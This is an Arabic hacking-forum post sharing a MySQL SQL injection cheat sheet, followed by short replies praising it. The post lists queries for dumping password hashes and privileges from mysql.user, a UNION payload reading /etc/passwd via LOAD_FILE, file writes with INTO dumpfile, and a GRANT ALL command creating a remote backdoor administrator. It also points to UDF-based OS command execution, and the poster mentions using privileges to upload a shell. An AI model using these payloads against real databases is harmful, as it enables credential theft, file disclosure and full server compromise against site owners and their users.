![]() |
Injection Cheat Sheet - # MySqL السلام عليكم ورحمه الله وبركاته اليوم جبت لكم موضوع روعه تحبونه كلكم لكن الي راح تزعلو منه اني مش راح اترجم لانه امر ومعناه وما يصح ترجمته ركزو تفهمو ن :] mysql-sql-injection-cheat-sheet Version كود: SELECT @@versionComments كود: SELECT 1; #commentCurrent User كود: SELECT user();List Users كود: SELECT user FROM mysql.user; -- privList Password Hashes كود: SELECT host, user, password FROM mysql.user; -- privPassword Cracker . List Privileges كود: SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privsكود: فوق امر برايفت عشان نرفع شيل هع هع خليكم تكتشفونه لحالكم ما رح اكمل كلام ............ كود: SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)كود: SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columnsList DBA Accounts كود: SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';كود: SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # privCurrent Database كود: SELECT database()List Databases كود: SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0كود: SELECT distinct(db) FROM mysql.db -- priv8List Tables كود: SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'Find Tables From Column Name كود: SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'Select Nth Row كود: SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0Select Nth Char كود: SELECT substr('abcd', 3, 1); # returns cBitwise AND كود: SELECT 6 & 2; # returns 2كود: SELECT 6 & 1; # returns 0ASCII Value -> Char كود: SELECT char(65); # returns AChar -> ASCII Value كود: SELECT ascii('A'); # returns 65Casting كود: SELECT cast('1' AS unsigned integer);String Concatenation كود: SELECT CONCAT('A','B'); #returns ABIf Statement كود: Case Statement كود: SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns AAvoiding Quotes كود: Time Delay كود: SELECT BENCHMARK(1000000,MD5('A'));Command Execution بصراحه اول مره اسمع فيها بس قويه كثير :S بحاول انزل لكم عليها فيديو كود: If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.Local File Access كود: ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read كود: SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file systemCreate Users كود: CREATE USER test1 IDENTIFIED BY 'pass1'; -- privDelete Users كود: DROP USER test1; -- privMake User DBA كود: GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- privLocation of DB files كود: SELECT @@datadirاتمنا انكم تفهمو الاستعلاماات :D موفقين |
[align=center]مشكور ياغالي على الدرس الرائع والاومر الجديدة والرائع جدا ابداعك مالة مثيل ابدا [/align] |
يعطيك العافيه اخ عبدالرحمن ابداع ماله حدود .. |
[align=center]تسلم عالاوامر يا أستاذ الحقن واصل... تحياتي لك[/align] |
[align=center]بارك الله فيك وجزاك كل خير دائما مبدع واصل ابداعك ياغالي[/align] |
مشكور ياغالي على الدرس الرائع والاومر الجديدة والرائع جدا |
| الساعة الآن 01:35 PM |
[ vBspiders.Com Network ]